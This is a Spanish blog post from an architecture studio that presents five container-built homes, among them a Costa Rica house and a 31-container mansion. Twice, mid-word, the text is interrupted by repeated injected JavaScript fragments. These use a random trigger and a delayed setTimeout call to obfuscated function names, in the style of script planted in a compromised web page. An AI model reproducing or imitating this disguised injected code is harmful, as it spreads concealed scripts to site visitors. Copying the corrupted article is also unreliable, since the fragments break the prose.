Estudio Dream | Estudio de Arquitectura Modular » Casas increíbles hechas con contenedores

Casas increíbles hechas con contenedores

Por todo el mundo se ha extendido la moda de hacer casas nuevas teniendo como base los contenedores modulares. En Estudio Dream construimos también con estas estructuras por las grandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andes ventajas que tienen tanto para el cliente como para nosotros. En primer lugar la construcción y montaje son mucho más sencillas y rápidas que si hiciéramos la obra con tabiques tradicionales, y en segundo lugar los costes se reducen de forma espectacular porque nos ahorramos los costosos materiales utilizados en la arquitectura de ladrillo y cemento.

En muchos casos los clientes optan por hacer una combinación entre las dos técnicas, consiguiendo así una casa cimentada y con base de ladrillos a la que luego se añade uno o varios módulos prefabricados para ganar altura. Hoy les vamos a enseñar verdaderas obras de arte que hemos encontrado alrededor del mundo y que nos inspiran para seguir haciendo lo que hacemos. Esperamos que les guste.

 

1. Casa hecha con ocho contenedores: Esta casa de dos alturas mide 210 metros cuadrados y su coste final fue de 700,000 libras. Su fachada exterior intenta imitar una casa tradicional, pero en el interior priman los espacios abiertos que se consiguió cortandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando los contenedores para que no tuvieran puertas interiores.

casa-8-contenedoressala-8-contenedorespasillo-8-contenedores

 

2. Contenedores de la Esperanza: Esta vivienda está construida a 20 minutos de la ciudad de San José (Costa Rica) y el precio total de la misma fue de 40.000 dólares. En ella vive una pareja que se quería alejar de la bulliciosa ciudad, pero estar lo suficientemente cerca como para poder ir a trabajar. Lo consiguieron, y a un precio muy asequible gracias al arquitecto Benjamin García Saxe.

contenedor-esperanzasala-esperanzasalon-conetenedor-esperanzacontenedor-esperanza-fuera

3. Casa contenedor en El Tiemblo: El exterior de esta casa es cuanto menos dudoso, lo que contrasta muchísimo con el interior lujoso elegante. La intención de los arquitectos James & Mau era causar sensación, y vaya si lo consiguieron.

casa-tiemblocasa-tiemblo-abiertacasa-tiemblo-habitacioncasa-tiemblo-sala

4. Casa hecha con 31 contenedores: el arquitecto Zeliger Build diseñó esa mansión con contenedores antiguos para demostrar que el lujo no está reñido con el reciclaje. En sus características destaca que es una casa autosuficiente con sistema de recogida de agua de lluvia, entre otras técnicas limpias. 

casa-31-contenedorescasa-31-contenedores-saloncasa-31-contenedores-piscina

5. Casa de contenedores abierta: la brillante idea de Adam Kalkin reflejaba que todas las estancias tuvieran puertas de cristal, con lo que consigue que entre muchísima luz a la casa y una interacción entre interior y exterior.

04-kalkin-container-fachadaescaleras-contenedores07-módulos-casa-container

 

 

Comments : 0